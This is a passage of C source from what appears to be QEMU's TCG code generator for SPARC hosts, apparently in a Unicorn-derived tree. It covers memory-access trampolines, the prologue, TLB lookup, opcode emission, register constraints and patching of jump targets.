retaddr operand. */ tcg_out_mov(s, TCG_TYPE_PTR, ra, TCG_REG_O7); /* Set the env operand. */ tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O0, TCG_AREG0); /* Tail call. */ tcg_out_call_nodelay(s, qemu_ld_helpers[i], true); tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O7, ra); } for (i = 0; i < 16; ++i) { if (qemu_st_helpers[i] == NULL) { continue; } /* May as well align the trampoline. */ while ((uintptr_t)s->code_ptr & 15) { tcg_out_nop(s); } qemu_st_trampoline[i] = s->code_ptr; if (SPARC64) { emit_extend(s, TCG_REG_O2, i); ra = TCG_REG_O4; } else { ra = TCG_REG_O1; if (TARGET_LONG_BITS == 64) { /* Install the high part of the address. */ tcg_out_arithi(s, ra, ra + 1, 32, SHIFT_SRLX); ra += 2; } else { ra += 1; } if ((i & MO_SIZE) == MO_64) { /* Install the high part of the data. */ tcg_out_arithi(s, ra, ra + 1, 32, SHIFT_SRLX); ra += 2; } else { emit_extend(s, ra, i); ra += 1; } /* Skip the oi argument. */ ra += 1; } /* Set the retaddr operand. */ if (ra >= TCG_REG_O6) { tcg_out_st(s, TCG_TYPE_PTR, TCG_REG_O7, TCG_REG_CALL_STACK, TCG_TARGET_CALL_STACK_OFFSET); ra = TCG_REG_G1; } tcg_out_mov(s, TCG_TYPE_PTR, ra, TCG_REG_O7); /* Set the env operand. */ tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O0, TCG_AREG0); /* Tail call. */ tcg_out_call_nodelay(s, qemu_st_helpers[i], true); tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O7, ra); } } #endif /* Generate global QEMU prologue and epilogue code */ static void tcg_target_qemu_prologue(TCGContext *s) { int tmp_buf_size, frame_size; /* The TCG temp buffer is at the top of the frame, immediately below the frame pointer. */ tmp_buf_size = CPU_TEMP_BUF_NLONGS * (int)sizeof(long); tcg_set_frame(s, TCG_REG_I6, TCG_TARGET_STACK_BIAS - tmp_buf_size, tmp_buf_size); /* TCG_TARGET_CALL_STACK_OFFSET includes the stack bias, but is otherwise the minimal frame usable by callees. */ frame_size = TCG_TARGET_CALL_STACK_OFFSET - TCG_TARGET_STACK_BIAS; frame_size += TCG_STATIC_CALL_ARGS_SIZE + tmp_buf_size; frame_size += TCG_TARGET_STACK_ALIGN - 1; frame_size &= -TCG_TARGET_STACK_ALIGN; tcg_out32(s, SAVE | INSN_RD(TCG_REG_O6) | INSN_RS1(TCG_REG_O6) | INSN_IMM13(-frame_size)); #ifndef CONFIG_SOFTMMU if (guest_base != 0) { tcg_out_movi_int(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, guest_base, true); tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); } #endif /* We choose TCG_REG_TB such that no move is required. */ if (USE_REG_TB) { QEMU_BUILD_BUG_ON(TCG_REG_TB != TCG_REG_I1); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TB); } tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I1, 0, JMPL); /* delay slot */ tcg_out_nop(s); /* Epilogue for goto_ptr. */ s->code_gen_epilogue = s->code_ptr; tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); /* delay slot */ tcg_out_movi_imm13(s, TCG_REG_O0, 0); #ifdef CONFIG_SOFTMMU build_trampolines(s); #endif } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { int i; for (i = 0; i < count; ++i) { p[i] = NOP; } } #if defined(CONFIG_SOFTMMU) /* We expect to use a 13-bit negative offset from ENV. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -(1 << 12)); /* Perform the TLB load and compare. Inputs: ADDRLO and ADDRHI contain the possible two parts of the address. MEM_INDEX and S_BITS are the memory context and log2 size of the load. WHICH is the offset into the CPUTLBEntry structure of the slot to read. This should be offsetof addr_read or addr_write. The result of the TLB comparison is in %[ix]cc. The sanitized address is in the returned register, maybe %o0. The TLB addend is in %o1. */ static TCGReg tcg_out_tlb_load(TCGContext *s, TCGReg addr, int mem_index, MemOp opc, int which) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif int fast_off = TLB_MASK_TABLE_OFS(mem_index); int mask_off = fast_off + offsetof(CPUTLBDescFast, mask); int table_off = fast_off + offsetof(CPUTLBDescFast, table); const TCGReg r0 = TCG_REG_O0; const TCGReg r1 = TCG_REG_O1; const TCGReg r2 = TCG_REG_O2; unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); tcg_target_long compare_mask; /* Load tlb_mask[mmu_idx] and tlb_table[mmu_idx]. */ tcg_out_ld(s, TCG_TYPE_PTR, r0, TCG_AREG0, mask_off); tcg_out_ld(s, TCG_TYPE_PTR, r1, TCG_AREG0, table_off); /* Extract the page index, shifted into place for tlb index. */ tcg_out_arithi(s, r2, addr, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS, SHIFT_SRL); tcg_out_arith(s, r2, r2, r0, ARITH_AND); /* Add the tlb_table pointer, creating the CPUTLBEntry address into R2. */ tcg_out_arith(s, r2, r2, r1, ARITH_ADD); /* Load the tlb comparator and the addend. */ tcg_out_ld(s, TCG_TYPE_TL, r0, r2, which); tcg_out_ld(s, TCG_TYPE_PTR, r1, r2, offsetof(CPUTLBEntry, addend)); /* Mask out the page offset, except for the required alignment. We don't support unaligned accesses. */ if (a_bits < s_bits) { a_bits = s_bits; } compare_mask = (tcg_target_ulong)TARGET_PAGE_MASK | ((1 << a_bits) - 1); if (check_fit_tl(compare_mask, 13)) { tcg_out_arithi(s, r2, addr, compare_mask, ARITH_AND); } else { tcg_out_movi(s, TCG_TYPE_TL, r2, compare_mask); tcg_out_arith(s, r2, addr, r2, ARITH_AND); } tcg_out_cmp(s, r0, r2, 0); /* If the guest address must be zero-extended, do so now. */ if (SPARC64 && TARGET_LONG_BITS == 32) { tcg_out_arithi(s, r0, addr, 0, SHIFT_SRL); return r0; } return addr; } #endif /* CONFIG_SOFTMMU */ static const int qemu_ld_opc[16] = { [MO_UB] = LDUB, [MO_SB] = LDSB, [MO_BEUW] = LDUH, [MO_BESW] = LDSH, [MO_BEUL] = LDUW, [MO_BESL] = LDSW, [MO_BEQ] = LDX, [MO_LEUW] = LDUH_LE, [MO_LESW] = LDSH_LE, [MO_LEUL] = LDUW_LE, [MO_LESL] = LDSW_LE, [MO_LEQ] = LDX_LE, }; static const int qemu_st_opc[16] = { [MO_UB] = STB, [MO_BEUW] = STH, [MO_BEUL] = STW, [MO_BEQ] = STX, [MO_LEUW] = STH_LE, [MO_LEUL] = STW_LE, [MO_LEQ] = STX_LE, }; static void tcg_out_qemu_ld(TCGContext *s, TCGReg data, TCGReg addr, TCGMemOpIdx oi, bool is_64) { MemOp memop = get_memop(oi); #ifdef CONFIG_SOFTMMU unsigned memi = get_mmuidx(oi); TCGReg addrz, param; tcg_insn_unit *func; tcg_insn_unit *label_ptr; addrz = tcg_out_tlb_load(s, addr, memi, memop, offsetof(CPUTLBEntry, addr_read)); /* The fast path is exactly one insn. Thus we can perform the entire TLB Hit in the (annulled) delay slot of the branch over the TLB Miss case. */ /* beq,a,pt %[xi]cc, label0 */ label_ptr = s->code_ptr; tcg_out_bpcc0(s, COND_E, BPCC_A | BPCC_PT | (TARGET_LONG_BITS == 64 ? BPCC_XCC : BPCC_ICC), 0); /* delay slot */ tcg_out_ldst_rr(s, data, addrz, TCG_REG_O1, qemu_ld_opc[memop & (MO_BSWAP | MO_SSIZE)]); /* TLB Miss. */ param = TCG_REG_O1; if (!SPARC64 && TARGET_LONG_BITS == 64) { /* Skip the high-part; we'll perform the extract in the trampoline. */ param++; } tcg_out_mov(s, TCG_TYPE_REG, param++, addrz); /* We use the helpers to extend SB and SW data, leaving the case of SL needing explicit extending below. */ if ((memop & MO_SSIZE) == MO_SL) { func = qemu_ld_trampoline[memop & (MO_BSWAP | MO_SIZE)]; } else { func = qemu_ld_trampoline[memop & (MO_BSWAP | MO_SSIZE)]; } tcg_debug_assert(func != NULL); tcg_out_call_nodelay(s, func, false); /* delay slot */ tcg_out_movi(s, TCG_TYPE_I32, param, oi); /* Recall that all of the helpers return 64-bit results. Which complicates things for sparcv8plus. */ if (SPARC64) { /* We let the helper sign-extend SB and SW, but leave SL for here. */ if (is_64 && (memop & MO_SSIZE) == MO_SL) { tcg_out_arithi(s, data, TCG_REG_O0, 0, SHIFT_SRA); } else { tcg_out_mov(s, TCG_TYPE_REG, data, TCG_REG_O0); } } else { if ((memop & MO_SIZE) == MO_64) { tcg_out_arithi(s, TCG_REG_O0, TCG_REG_O0, 32, SHIFT_SLLX); tcg_out_arithi(s, TCG_REG_O1, TCG_REG_O1, 0, SHIFT_SRL); tcg_out_arith(s, data, TCG_REG_O0, TCG_REG_O1, ARITH_OR); } else if (is_64) { /* Re-extend from 32-bit rather than reassembling when we know the high register must be an extension. */ tcg_out_arithi(s, data, TCG_REG_O1, 0, memop & MO_SIGN ? SHIFT_SRA : SHIFT_SRL); } else { tcg_out_mov(s, TCG_TYPE_I32, data, TCG_REG_O1); } } *label_ptr |= INSN_OFF19(tcg_ptr_byte_diff(s->code_ptr, label_ptr)); #else if (SPARC64 && TARGET_LONG_BITS == 32) { tcg_out_arithi(s, TCG_REG_T1, addr, 0, SHIFT_SRL); addr = TCG_REG_T1; } tcg_out_ldst_rr(s, data, addr, (guest_base ? TCG_GUEST_BASE_REG : TCG_REG_G0), qemu_ld_opc[memop & (MO_BSWAP | MO_SSIZE)]); #endif /* CONFIG_SOFTMMU */ } static void tcg_out_qemu_st(TCGContext *s, TCGReg data, TCGReg addr, TCGMemOpIdx oi) { MemOp memop = get_memop(oi); #ifdef CONFIG_SOFTMMU unsigned memi = get_mmuidx(oi); TCGReg addrz, param; tcg_insn_unit *func; tcg_insn_unit *label_ptr; addrz = tcg_out_tlb_load(s, addr, memi, memop, offsetof(CPUTLBEntry, addr_write)); /* The fast path is exactly one insn. Thus we can perform the entire TLB Hit in the (annulled) delay slot of the branch over TLB Miss. */ /* beq,a,pt %[xi]cc, label0 */ label_ptr = s->code_ptr; tcg_out_bpcc0(s, COND_E, BPCC_A | BPCC_PT | (TARGET_LONG_BITS == 64 ? BPCC_XCC : BPCC_ICC), 0); /* delay slot */ tcg_out_ldst_rr(s, data, addrz, TCG_REG_O1, qemu_st_opc[memop & (MO_BSWAP | MO_SIZE)]); /* TLB Miss. */ param = TCG_REG_O1; if (!SPARC64 && TARGET_LONG_BITS == 64) { /* Skip the high-part; we'll perform the extract in the trampoline. */ param++; } tcg_out_mov(s, TCG_TYPE_REG, param++, addrz); if (!SPARC64 && (memop & MO_SIZE) == MO_64) { /* Skip the high-part; we'll perform the extract in the trampoline. */ param++; } tcg_out_mov(s, TCG_TYPE_REG, param++, data); func = qemu_st_trampoline[memop & (MO_BSWAP | MO_SIZE)]; tcg_debug_assert(func != NULL); tcg_out_call_nodelay(s, func, false); /* delay slot */ tcg_out_movi(s, TCG_TYPE_I32, param, oi); *label_ptr |= INSN_OFF19(tcg_ptr_byte_diff(s->code_ptr, label_ptr)); #else if (SPARC64 && TARGET_LONG_BITS == 32) { tcg_out_arithi(s, TCG_REG_T1, addr, 0, SHIFT_SRL); addr = TCG_REG_T1; } tcg_out_ldst_rr(s, data, addr, (guest_base ? TCG_GUEST_BASE_REG : TCG_REG_G0), qemu_st_opc[memop & (MO_BSWAP | MO_SIZE)]); #endif /* CONFIG_SOFTMMU */ } static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg args[TCG_MAX_OP_ARGS], const int const_args[TCG_MAX_OP_ARGS]) { TCGArg a0, a1, a2; int c, c2; /* Hoist the loads of the most common arguments. */ a0 = args[0]; a1 = args[1]; a2 = args[2]; c2 = const_args[2]; switch (opc) { case INDEX_op_exit_tb: if (check_fit_ptr(a0, 13)) { tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); tcg_out_movi_imm13(s, TCG_REG_O0, a0); break; } else if (USE_REG_TB) { intptr_t tb_diff = a0 - (uintptr_t)s->code_gen_ptr; if (check_fit_ptr(tb_diff, 13)) { tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); /* Note that TCG_REG_TB has been unwound to O1. */ tcg_out_arithi(s, TCG_REG_O0, TCG_REG_O1, tb_diff, ARITH_ADD); break; } } tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_I0, a0 & ~0x3ff); tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); tcg_out_arithi(s, TCG_REG_O0, TCG_REG_O0, a0 & 0x3ff, ARITH_OR); break; case INDEX_op_goto_tb: if (s->tb_jmp_insn_offset) { /* direct jump method */ if (USE_REG_TB) { /* make sure the patch is 8-byte aligned. */ if ((intptr_t)s->code_ptr & 4) { tcg_out_nop(s); } s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); tcg_out_sethi(s, TCG_REG_T1, 0); tcg_out_arithi(s, TCG_REG_T1, TCG_REG_T1, 0, ARITH_OR); tcg_out_arith(s, TCG_REG_G0, TCG_REG_TB, TCG_REG_T1, JMPL); tcg_out_arith(s, TCG_REG_TB, TCG_REG_TB, TCG_REG_T1, ARITH_ADD); } else { s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); tcg_out32(s, CALL); tcg_out_nop(s); } } else { /* indirect jump method */ tcg_out_ld_ptr(s, TCG_REG_TB, (uintptr_t)(s->tb_jmp_target_addr + a0)); tcg_out_arithi(s, TCG_REG_G0, TCG_REG_TB, 0, JMPL); tcg_out_nop(s); } set_jmp_reset_offset(s, a0); /* For the unlinked path of goto_tb, we need to reset TCG_REG_TB to the beginning of this TB. */ if (USE_REG_TB) { c = -tcg_current_code_size(s); if (check_fit_i32(c, 13)) { tcg_out_arithi(s, TCG_REG_TB, TCG_REG_TB, c, ARITH_ADD); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T1, c); tcg_out_arith(s, TCG_REG_TB, TCG_REG_TB, TCG_REG_T1, ARITH_ADD); } } break; case INDEX_op_goto_ptr: tcg_out_arithi(s, TCG_REG_G0, a0, 0, JMPL); if (USE_REG_TB) { tcg_out_arith(s, TCG_REG_TB, a0, TCG_REG_G0, ARITH_OR); } else { tcg_out_nop(s); } break; case INDEX_op_br: tcg_out_bpcc(s, COND_A, BPCC_PT, arg_label(a0)); tcg_out_nop(s); break; #define OP_32_64(x) \ glue(glue(case INDEX_op_, x), _i32): \ glue(glue(case INDEX_op_, x), _i64) OP_32_64(ld8u): tcg_out_ldst(s, a0, a1, a2, LDUB); break; OP_32_64(ld8s): tcg_out_ldst(s, a0, a1, a2, LDSB); break; OP_32_64(ld16u): tcg_out_ldst(s, a0, a1, a2, LDUH); break; OP_32_64(ld16s): tcg_out_ldst(s, a0, a1, a2, LDSH); break; case INDEX_op_ld_i32: case INDEX_op_ld32u_i64: tcg_out_ldst(s, a0, a1, a2, LDUW); break; OP_32_64(st8): tcg_out_ldst(s, a0, a1, a2, STB); break; OP_32_64(st16): tcg_out_ldst(s, a0, a1, a2, STH); break; case INDEX_op_st_i32: case INDEX_op_st32_i64: tcg_out_ldst(s, a0, a1, a2, STW); break; OP_32_64(add): c = ARITH_ADD; goto gen_arith; OP_32_64(sub): c = ARITH_SUB; goto gen_arith; OP_32_64(and): c = ARITH_AND; goto gen_arith; OP_32_64(andc): c = ARITH_ANDN; goto gen_arith; OP_32_64(or): c = ARITH_OR; goto gen_arith; OP_32_64(orc): c = ARITH_ORN; goto gen_arith; OP_32_64(xor): c = ARITH_XOR; goto gen_arith; case INDEX_op_shl_i32: c = SHIFT_SLL; do_shift32: /* Limit immediate shift count lest we create an illegal insn. */ tcg_out_arithc(s, a0, a1, a2 & 31, c2, c); break; case INDEX_op_shr_i32: c = SHIFT_SRL; goto do_shift32; case INDEX_op_sar_i32: c = SHIFT_SRA; goto do_shift32; case INDEX_op_mul_i32: c = ARITH_UMUL; goto gen_arith; OP_32_64(neg): c = ARITH_SUB; goto gen_arith1; OP_32_64(not): c = ARITH_ORN; goto gen_arith1; case INDEX_op_div_i32: tcg_out_div32(s, a0, a1, a2, c2, 0); break; case INDEX_op_divu_i32: tcg_out_div32(s, a0, a1, a2, c2, 1); break; case INDEX_op_brcond_i32: tcg_out_brcond_i32(s, a2, a0, a1, const_args[1], arg_label(args[3])); break; case INDEX_op_setcond_i32: tcg_out_setcond_i32(s, args[3], a0, a1, a2, c2); break; case INDEX_op_movcond_i32: tcg_out_movcond_i32(s, args[5], a0, a1, a2, c2, args[3], const_args[3]); break; case INDEX_op_add2_i32: tcg_out_addsub2_i32(s, args[0], args[1], args[2], args[3], args[4], const_args[4], args[5], const_args[5], ARITH_ADDCC, ARITH_ADDC); break; case INDEX_op_sub2_i32: tcg_out_addsub2_i32(s, args[0], args[1], args[2], args[3], args[4], const_args[4], args[5], const_args[5], ARITH_SUBCC, ARITH_SUBC); break; case INDEX_op_mulu2_i32: c = ARITH_UMUL; goto do_mul2; case INDEX_op_muls2_i32: c = ARITH_SMUL; do_mul2: /* The 32-bit multiply insns produce a full 64-bit result. If the destination register can hold it, we can avoid the slower RDY. */ tcg_out_arithc(s, a0, a2, args[3], const_args[3], c); if (SPARC64 || a0 <= TCG_REG_O7) { tcg_out_arithi(s, a1, a0, 32, SHIFT_SRLX); } else { tcg_out_rdy(s, a1); } break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, a0, a1, a2, false); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, a0, a1, a2, true); break; case INDEX_op_qemu_st_i32: case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, a0, a1, a2); break; case INDEX_op_ld32s_i64: tcg_out_ldst(s, a0, a1, a2, LDSW); break; case INDEX_op_ld_i64: tcg_out_ldst(s, a0, a1, a2, LDX); break; case INDEX_op_st_i64: tcg_out_ldst(s, a0, a1, a2, STX); break; case INDEX_op_shl_i64: c = SHIFT_SLLX; do_shift64: /* Limit immediate shift count lest we create an illegal insn. */ tcg_out_arithc(s, a0, a1, a2 & 63, c2, c); break; case INDEX_op_shr_i64: c = SHIFT_SRLX; goto do_shift64; case INDEX_op_sar_i64: c = SHIFT_SRAX; goto do_shift64; case INDEX_op_mul_i64: c = ARITH_MULX; goto gen_arith; case INDEX_op_div_i64: c = ARITH_SDIVX; goto gen_arith; case INDEX_op_divu_i64: c = ARITH_UDIVX; goto gen_arith; case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: tcg_out_arithi(s, a0, a1, 0, SHIFT_SRA); break; case INDEX_op_extu_i32_i64: case INDEX_op_ext32u_i64: tcg_out_arithi(s, a0, a1, 0, SHIFT_SRL); break; case INDEX_op_extrl_i64_i32: tcg_out_mov(s, TCG_TYPE_I32, a0, a1); break; case INDEX_op_extrh_i64_i32: tcg_out_arithi(s, a0, a1, 32, SHIFT_SRLX); break; case INDEX_op_brcond_i64: tcg_out_brcond_i64(s, a2, a0, a1, const_args[1], arg_label(args[3])); break; case INDEX_op_setcond_i64: tcg_out_setcond_i64(s, args[3], a0, a1, a2, c2); break; case INDEX_op_movcond_i64: tcg_out_movcond_i64(s, args[5], a0, a1, a2, c2, args[3], const_args[3]); break; case INDEX_op_add2_i64: tcg_out_addsub2_i64(s, args[0], args[1], args[2], args[3], args[4], const_args[4], args[5], const_args[5], false); break; case INDEX_op_sub2_i64: tcg_out_addsub2_i64(s, args[0], args[1], args[2], args[3], args[4], const_args[4], args[5], const_args[5], true); break; case INDEX_op_muluh_i64: tcg_out_arith(s, args[0], args[1], args[2], ARITH_UMULXHI); break; gen_arith: tcg_out_arithc(s, a0, a1, a2, c2, c); break; gen_arith1: tcg_out_arithc(s, a0, TCG_REG_G0, a1, const_args[1], c); break; case INDEX_op_mb: tcg_out_mb(s, a0); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: tcg_abort(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef R_r = { .args_ct_str = { "R", "r" } }; static const TCGTargetOpDef r_R = { .args_ct_str = { "r", "R" } }; static const TCGTargetOpDef R_R = { .args_ct_str = { "R", "R" } }; static const TCGTargetOpDef r_A = { .args_ct_str = { "r", "A" } }; static const TCGTargetOpDef R_A = { .args_ct_str = { "R", "A" } }; static const TCGTargetOpDef rZ_r = { .args_ct_str = { "rZ", "r" } }; static const TCGTargetOpDef RZ_r = { .args_ct_str = { "RZ", "r" } }; static const TCGTargetOpDef sZ_A = { .args_ct_str = { "sZ", "A" } }; static const TCGTargetOpDef SZ_A = { .args_ct_str = { "SZ", "A" } }; static const TCGTargetOpDef rZ_rJ = { .args_ct_str = { "rZ", "rJ" } }; static const TCGTargetOpDef RZ_RJ = { .args_ct_str = { "RZ", "RJ" } }; static const TCGTargetOpDef R_R_R = { .args_ct_str = { "R", "R", "R" } }; static const TCGTargetOpDef r_rZ_rJ = { .args_ct_str = { "r", "rZ", "rJ" } }; static const TCGTargetOpDef R_RZ_RJ = { .args_ct_str = { "R", "RZ", "RJ" } }; static const TCGTargetOpDef r_r_rZ_rJ = { .args_ct_str = { "r", "r", "rZ", "rJ" } }; static const TCGTargetOpDef movc_32 = { .args_ct_str = { "r", "rZ", "rJ", "rI", "0" } }; static const TCGTargetOpDef movc_64 = { .args_ct_str = { "R", "RZ", "RJ", "RI", "0" } }; static const TCGTargetOpDef add2_32 = { .args_ct_str = { "r", "r", "rZ", "rZ", "rJ", "rJ" } }; static const TCGTargetOpDef add2_64 = { .args_ct_str = { "R", "R", "RZ", "RZ", "RJ", "RI" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_neg_i32: case INDEX_op_not_i32: return &r_r; case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: return &rZ_r; case INDEX_op_add_i32: case INDEX_op_mul_i32: case INDEX_op_div_i32: case INDEX_op_divu_i32: case INDEX_op_sub_i32: case INDEX_op_and_i32: case INDEX_op_andc_i32: case INDEX_op_or_i32: case INDEX_op_orc_i32: case INDEX_op_xor_i32: case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_setcond_i32: return &r_rZ_rJ; case INDEX_op_brcond_i32: return &rZ_rJ; case INDEX_op_movcond_i32: return &movc_32; case INDEX_op_add2_i32: case INDEX_op_sub2_i32: return &add2_32; case INDEX_op_mulu2_i32: case INDEX_op_muls2_i32: return &r_r_rZ_rJ; case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: return &R_r; case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: return &RZ_r; case INDEX_op_add_i64: case INDEX_op_mul_i64: case INDEX_op_div_i64: case INDEX_op_divu_i64: case INDEX_op_sub_i64: case INDEX_op_and_i64: case INDEX_op_andc_i64: case INDEX_op_or_i64: case INDEX_op_orc_i64: case INDEX_op_xor_i64: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: case INDEX_op_setcond_i64: return &R_RZ_RJ; case INDEX_op_neg_i64: case INDEX_op_not_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext32u_i64: return &R_R; case INDEX_op_extrl_i64_i32: case INDEX_op_extrh_i64_i32: return &r_R; case INDEX_op_brcond_i64: return &RZ_RJ; case INDEX_op_movcond_i64: return &movc_64; case INDEX_op_add2_i64: case INDEX_op_sub2_i64: return &add2_64; case INDEX_op_muluh_i64: return &R_R_R; case INDEX_op_qemu_ld_i32: return &r_A; case INDEX_op_qemu_ld_i64: return &R_A; case INDEX_op_qemu_st_i32: return &sZ_A; case INDEX_op_qemu_st_i64: return &SZ_A; default: return NULL; } } static void tcg_target_init(TCGContext *s) { /* Only probe for the platform and capabilities if we havn't already determined maximum values at compile time. */ #ifndef use_vis3_instructions { unsigned long hwcap = qemu_getauxval(AT_HWCAP); use_vis3_instructions = (hwcap & HWCAP_SPARC_VIS3) != 0; } #endif s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffffffff; s->tcg_target_available_regs[TCG_TYPE_I64] = ALL_64; s->tcg_target_call_clobber_regs = 0; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G4); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G5); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G6); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G7); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O4); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O5); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O6); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O7); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_G0); /* zero */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_G6); /* reserved for os */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_G7); /* thread pointer */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_I6); /* frame pointer */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_I7); /* return address */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_O6); /* stack pointer */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_T1); /* for internal use */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_T2); /* for internal use */ } #if SPARC64 # define ELF_HOST_MACHINE EM_SPARCV9 #else # define ELF_HOST_MACHINE EM_SPARC32PLUS # define ELF_HOST_FLAGS EF_SPARC_32PLUS #endif typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[SPARC64 ? 4 : 2]; uint8_t fde_win_save; uint8_t fde_ret_save[3]; } DebugFrame; static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = -sizeof(void *) & 0x7f, .h.cie.return_column = 15, /* o7 */ /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { #if SPARC64 12, 30, /* DW_CFA_def_cfa i6, 2047 */ (2047 & 0x7f) | 0x80, (2047 >> 7) #else 13, 30 /* DW_CFA_def_cfa_register i6 */ #endif }, .fde_win_save = 0x2d, /* DW_CFA_GNU_window_save */ .fde_ret_save = { 9, 15, 31 }, /* DW_CFA_register o7, i7 */ }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); } void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { intptr_t tb_disp = addr - tc_ptr; intptr_t br_disp = addr - jmp_addr; tcg_insn_unit i1, i2; /* We can reach the entire address space for ILP32. For LP64, the code_gen_buffer can't be larger than 2GB. */ tcg_debug_assert(tb_disp == (int32_t)tb_disp); tcg_debug_assert(br_disp == (int32_t)br_disp); if (!USE_REG_TB) { atomic_set((uint32_t *)jmp_addr, deposit32(CALL, 0, 30, br_disp >> 2)); flush_icache_range(jmp_addr, jmp_addr + 4); return; } /* This does not exercise the range of the branch, but we do still need to be able to load the new value of TCG_REG_TB. But this does still happen quite often. */ if (check_fit_ptr(tb_disp, 13)) { /* ba,pt %icc, addr */ i1 = (INSN_OP(0) | INSN_OP2(1) | INSN_COND(COND_A) | BPCC_ICC | BPCC_PT | INSN_OFF19(br_disp)); i2 = (ARITH_ADD | INSN_RD(TCG_REG_TB) | INSN_RS1(TCG_REG_TB) | INSN_IMM13(tb_disp)); } else if (tb_disp >= 0) { i1 = SETHI | INSN_RD(TCG_REG_T1) | ((tb_disp & 0xfffffc00) >> 10); i2 = (ARITH_OR | INSN_RD(TCG_REG_T1) | INSN_RS1(TCG_REG_T1) | INSN_IMM13(tb_disp & 0x3ff)); } else { i1 = SETHI | INSN_RD(TCG_REG_T1) | ((~tb_disp & 0xfffffc00) >> 10); i2 = (ARITH_XOR | INSN_RD(TCG_REG_T1) | INSN_RS1(TCG_REG_T1) | INSN_IMM13((tb_disp & 0x3ff) | -0x400)); } atomic_set((uint64_t *)jmp_addr, deposit64(i2, 32, 32, i1)); flush_icache_range(jmp_addr, jmp_addr + 8); } 